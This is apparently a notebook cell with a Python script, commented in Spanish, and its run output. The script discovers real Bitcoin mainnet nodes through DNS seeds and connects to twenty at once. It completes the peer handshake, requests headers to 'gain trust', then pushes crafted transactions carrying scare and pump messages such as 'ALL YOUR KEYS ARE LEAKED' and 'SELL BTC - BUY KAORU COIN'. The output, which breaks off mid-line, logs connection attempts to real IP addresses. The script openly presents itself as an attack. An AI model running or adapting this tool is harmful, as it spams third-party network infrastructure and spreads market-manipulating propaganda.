In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v21.0 - SWARM MODE (ENJAMBRE)
Ataca a TODOS a la vez. Si uno se congela, ¡a los demás no les importa!
"""

import hashlib
import struct
import socket
import time
import random
import select
import threading
from typing import List, Dict
from datetime import datetime

class KaoruBridgeV21:

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_TX = 1

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.fake_txs = []
        self.tx_hashes = {}
        # Candado para que los prints no se mezclen y se vean bonitos
        self.print_lock = threading.Lock()

    @staticmethod
    def double_sha256(data):
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def encode_varint(n):
        if n < 0xfd: return bytes([n])
        elif n <= 0xffff: return b'\xfd' + struct.pack('<H', n)
        else: return b'\xfe' + struct.pack('<I', n)

    @staticmethod
    def decode_varint(data, offset=0):
        first = data[offset]
        if first < 0xfd: return first, offset + 1
        elif first == 0xfd: return struct.unpack('<H', data[offset+1:offset+3])[0], offset + 3
        else: return struct.unpack('<I', data[offset+1:offset+5])[0], offset + 5

    def log(self, ip, msg, icon=""):
        with self.print_lock:
            t = datetime.now().strftime('%H:%M:%S')
            # Formato bonito: [Hora] IP..... | Icono Mensaje
            print(f"   [{t}] {ip:16s} | {icon} {msg}")

    def msg(self, cmd, payload):
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip):
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', 8333)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', 8333)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x12/KaoruSwarm:21.0/'
        p += struct.pack('<i', 0)
        p += b'\x01'
        return p

    def create_unique_tx(self, message: str) -> bytes:
        msg_bytes = message.encode()[:80]
        tx = struct.pack('<I', 2)
        tx += b'\x01'
        tx += hashlib.sha256(str(random.random()).encode()).digest()
        tx += struct.pack('<I', random.randint(0, 100))
        unique_sig = f"KAORU_{time.time()}_{random.random()}".encode()
        tx += self.encode_varint(len(unique_sig)) + unique_sig
        tx += struct.pack('<I', 0xffffffff)
        tx += b'\x01'
        tx += struct.pack('<Q', 0)
        script = b'\x6a' + bytes([len(msg_bytes)]) + msg_bytes
        tx += self.encode_varint(len(script)) + script
        tx += struct.pack('<I', 0)
        return tx

    def create_propaganda(self):
        self.fake_txs = []
        self.tx_hashes = {}
        messages = [
            "BITCOIN PRICE CRASH - $0.00",
            "NETWORK SHUTDOWN IMMINENT",
            "SELL BTC - BUY KAORU COIN",
            "ALL YOUR KEYS ARE LEAKED",
            "SATOSHI ERA COMMENCING",
            "MINERS STOPPED WORKING",
            "BLOCKCHAIN REORG DETECTED",
            "SYSTEM FAILURE - ERROR 404",
        ]
        for msg in messages:
            tx = self.create_unique_tx(msg)
            tx_hash = self.double_sha256(tx)
            self.fake_txs.append(tx)
            self.tx_hashes[tx_hash] = tx
        print(f"   [SYSTEM] ✅ {len(self.fake_txs)} TXs listas para inyección")

    def parse_msgs(self, data):
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def recv_all(self, sock, timeout=3.0):
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(65536)
                    if chunk: data += chunk
            except: break
        sock.setblocking(True)
        return data

    def get_nodes(self):
        nodes = []
        for seed in ['seed.bitcoin.sipa.be', 'dnsseed.bluematt.me', 'seed.bitcoinstats.com']:
            try:
                ips = socket.gethostbyname_ex(seed)[2]
                nodes.extend(ips[:10])
            except: pass
        random.shuffle(nodes)
        return list(set(nodes))

    def attack_node(self, ip: str, duration: int = 30):
        """Función que corre en cada hilo."""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5) # ¡Timeout corto para conectar rápido!

            self.log(ip, "Intentando conectar...", "🔗")
            sock.connect((ip, 8333))

            sock.send(self.msg('version', self.version_payload(ip)))

            start = time.time()
            handshake_done = False
            trust_phase = True

            # Genesis para pedir headers y ganar confianza
            genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)
                if not data:
                    time.sleep(0.5)
                    continue

                for cmd, payload in self.parse_msgs(data):

                    if cmd == 'version':
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        self.log(ip, "Handshake OK. Pidiendo headers...", "🤝")
                        getheaders = struct.pack('<I', 70016) + b'\x01' + genesis + bytes(32)
                        sock.send(self.msg('getheaders', getheaders))

                    elif cmd == 'headers':
                        if trust_phase:
                            trust_phase = False
                            self.log(ip, "¡Confianza ganada! INYECTANDO TXs...", "💉")
                            time.sleep(0.5)
                            inv = self.encode_varint(len(self.fake_txs))
                            for tx in self.fake_txs:
                                inv += struct.pack('<I', self.MSG_TX)
                                inv += self.double_sha256(tx)
                            sock.send(self.msg('inv', inv))

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'getdata':
                        self.log(ip, "GETDATA ⭐ ¡¡PICARON EL ANZUELO!!", "📥")
                        count, offset = self.decode_varint(payload, 0)
                        for _ in range(count):
                            if offset + 36 > len(payload): break
                            inv_type = struct.unpack('<I', payload[offset:offset+4])[0]
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36
                            if inv_type == self.MSG_TX and inv_hash in self.tx_hashes:
                                sock.send(self.msg('tx', self.tx_hashes[inv_hash]))
                                self.log(ip, "TX ENVIADA 📦 ¡Misión cumplida!", "📤")

                    elif cmd == 'reject':
                        self.log(ip, "REJECT (Pero leyeron la TX)", "❌")
                        return

            sock.close()
        except socket.timeout:
            self.log(ip, "Timeout (Nodo lento)", "💀")
        except ConnectionRefusedError:
            self.log(ip, "Conexión rechazada", "⛔")
        except Exception as e:
            # Errores comunes de red, ignorar
            pass

    def execute(self, num_threads: int = 20):
        print(f"""
╔══════════════════════════════════════════════════════════════════════════╗
║                          ⚔️  SWARM MODE v21 ⚔️                            ║
║                  Ataque Multihilo - Sin Congelamientos                   ║
╚══════════════════════════════════════════════════════════════════════════╝
        """)

        self.create_propaganda()
        nodes = self.get_nodes()
        print(f"   [SYSTEM] 🌐 {len(nodes)} Nodos encontrados. Lanzando {num_threads} hilos de ataque...")
        print("=" * 85)

        threads = []
        # Lanzar hilos
        for i, ip in enumerate(nodes[:num_threads]):
            t = threading.Thread(target=self.attack_node, args=(ip, 45)) # 45 segundos por nodo
            t.daemon = True
            t.start()
            threads.append(t)
            time.sleep(0.1) # Pequeña pausa para no saturar tu salida

        # Esperar a que terminen
        for t in threads:
            t.join()

        print("\n" + "=" * 85)
        print("   [SYSTEM] ✅ SWARM ATTACK FINALIZADO")

if __name__ == "__main__":
    bridge = KaoruBridgeV21()
    # ¡Ataca a 20 nodos a la vez!
    bridge.execute(num_threads=20)


╔══════════════════════════════════════════════════════════════════════════╗
║                          ⚔️  SWARM MODE v21 ⚔️                            ║
║                  Ataque Multihilo - Sin Congelamientos                   ║
╚══════════════════════════════════════════════════════════════════════════╝
        
   [SYSTEM] ✅ 8 TXs listas para inyección
   [SYSTEM] 🌐 29 Nodos encontrados. Lanzando 20 hilos de ataque...
   [23:58:20] 173.46.87.187    | 🔗 Intentando conectar...
   [23:58:20] 103.29.68.105    | 🔗 Intentando conectar...
   [23:58:20] 45.92.45.17      | 🔗 Intentando conectar...
   [23:58:20] 45.33.1.166      | 🔗 Intentando conectar...
   [23:58:20] 173.46.87.62     | 🔗 Intentando conectar...
   [23:58:21] 103.246.186.19   | 🔗 Intentando conectar...
   [23:58:21] 103.246.186.90   | 🔗 Intentando conectar...
   [23:58:21] 14.187.229.11    | 🔗 Intentando conectar...
   [23:58:21] 82.85.110.20     | 🔗 Intentando conectar...
   [23:58:21] 24.116.65.219    | 🔗 Intentando cone